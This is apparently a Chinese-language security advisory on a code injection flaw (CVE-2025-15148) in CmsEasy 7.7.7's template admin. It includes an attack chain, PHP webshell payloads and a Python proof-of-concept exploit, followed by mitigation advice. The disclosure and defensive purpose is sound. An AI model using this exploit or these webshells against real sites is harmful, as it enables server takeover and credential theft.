CmsEasy 7.7.7 代码注入漏洞 (CVE-2025-15148)

漏洞信息

漏洞编号

CVE-2025-15148

漏洞类型

代码注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

CmsEasy

漏洞概述

CmsEasy是一款流行的开源内容管理系统(CMS)，广泛应用于企业网站建设和个人博客搭建。该系统在7.7.7及之前版本中存在严重的代码注入漏洞，漏洞位于后端模板管理模块的savetemp_action函数中。攻击者可通过操纵content/tempdata参数实现恶意代码注入，进而可能获取服务器完全控制权。由于该漏洞需要高权限才能利用，主要威胁目标为管理后台被入侵或弱口令管理的网站。漏洞已于2025年12月28日公开披露，厂商在收到安全团队提前通知后未做出任何回应和修复。鉴于漏洞已公开利用，建议使用该系统的用户立即采取防护措施并关注官方更新。

技术细节

漏洞根源在于CmsEasy的后台模板管理功能中，/lib/admin/template_admin.php文件的savetemp_action函数对用户输入的content/tempdata参数缺乏有效的安全过滤和验证。攻击者在获得后台管理员权限后，可通过模板编辑功能提交包含PHP代码的恶意payload。当系统保存或渲染该模板时，未经消毒的用户输入会被当作代码执行，从而触发代码注入。由于该操作发生在服务端，攻击者可利用此漏洞执行任意PHP代码，包括但不限于：读取服务器敏感配置文件、上传webshell后门、窃取数据库凭证、进一步横向移动等。CVSS 3.1评分4.7(中危)主要因为利用条件需要高权限认证(PR:H)，但一旦成功可导致机密性、完整性和可用性三方面均有低至中等程度影响。

攻击链分析

STEP 1

步骤1

信息收集：扫描目标网站识别CmsEasy版本，确认版本 <= 7.7.7

STEP 2

步骤2

获取管理员权限：通过暴力破解、钓鱼或利用其他漏洞获取CmsEasy后台登录凭证

STEP 3

步骤3

访问模板管理页面：登录后台后导航至/lib/admin/template_admin.php的savetemp_action功能模块

STEP 4

步骤4

构造恶意payload：在content或tempdata参数中注入PHP代码，如<?php system($_GET['cmd']); ?>

STEP 5

步骤5

触发漏洞执行：提交包含恶意代码的请求，系统未过滤直接保存或执行注入代码

STEP 6

步骤6

部署后门：利用代码注入写入webshell或执行系统命令，建立持久化访问通道

STEP 7

步骤7

横向移动：读取数据库配置获取其他系统凭证，扩展攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15148 CmsEasy Code Injection PoC
# Target: CmsEasy <= 7.7.7
# Attack Vector: Backend Template Management - savetemp_action
# Requirement: Admin privileges

import requests
import sys

TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/index.php"
USERNAME = "admin"
PASSWORD = "password"

def login(session, target_url, admin_path, username, password):
    """Authenticate to CmsEasy admin panel"""
    login_url = f"{target_url}{admin_path}?m=admin&c=login&a=check"
    data = {
        "username": username,
        "password": password
    }
    response = session.post(login_url, data=data)
    return "success" in response.text.lower() or response.status_code == 200

def exploit_code_injection(session, target_url, admin_path, payload):
    """Inject PHP code via template admin function"""
    exploit_url = f"{target_url}{admin_path}?m=admin&c=template_admin&a=savetemp_action"
    data = {
        "content": payload,  # Malicious PHP code injection
        "tempdata": payload  # Alternative injection point
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    response = session.post(exploit_url, data=data, headers=headers)
    return response

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15148.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    session = requests.Session()
    
    # Step 1: Login to admin panel
    if not login(session, target, ADMIN_PATH, USERNAME, PASSWORD):
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")
    
    # Step 2: Inject malicious PHP code
    # Example: Write webshell to file
    webshell = "<?php @eval($_POST['cmd']); ?>"
    payload = webshell
    
    response = exploit_code_injection(session, target, ADMIN_PATH, payload)
    
    if response.status_code == 200:
        print("[+] Code injection successful")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    main()

影响范围

CmsEasy <= 7.7.7

防御指南

临时缓解措施

由于厂商未回应安全通知且暂无官方补丁，建议立即采取以下临时措施：1)如果暂时不需要使用模板管理功能，临时禁用或限制该功能访问；2)部署Web应用防火墙规则拦截包含<?php、eval、system等危险函数的请求；3)限制管理后台IP访问范围，仅允许可信IP段访问；4)加强管理员账户安全，使用强密码并定期更换；5)定期检查服务器文件系统异常变更，特别是.php文件的创建和修改；6)考虑使用WAF或IPS设备进行实时监控和告警；7)如有条件，可临时使用ModSecurity等开源WAF添加自定义规则防护该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15148
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15148
3 Details https://www.cvedetails.com/cve/CVE-2025-15148/
4 VulDB https://vuldb.com/cve/CVE-2025-15148
5 Link https://note-hxlab.wetolink.com/share/msJH69Y06ZlS
6 Link https://vuldb.com/?ctiid.338525
7 Link https://vuldb.com/?id.338525
8 Link https://vuldb.com/?submit.716303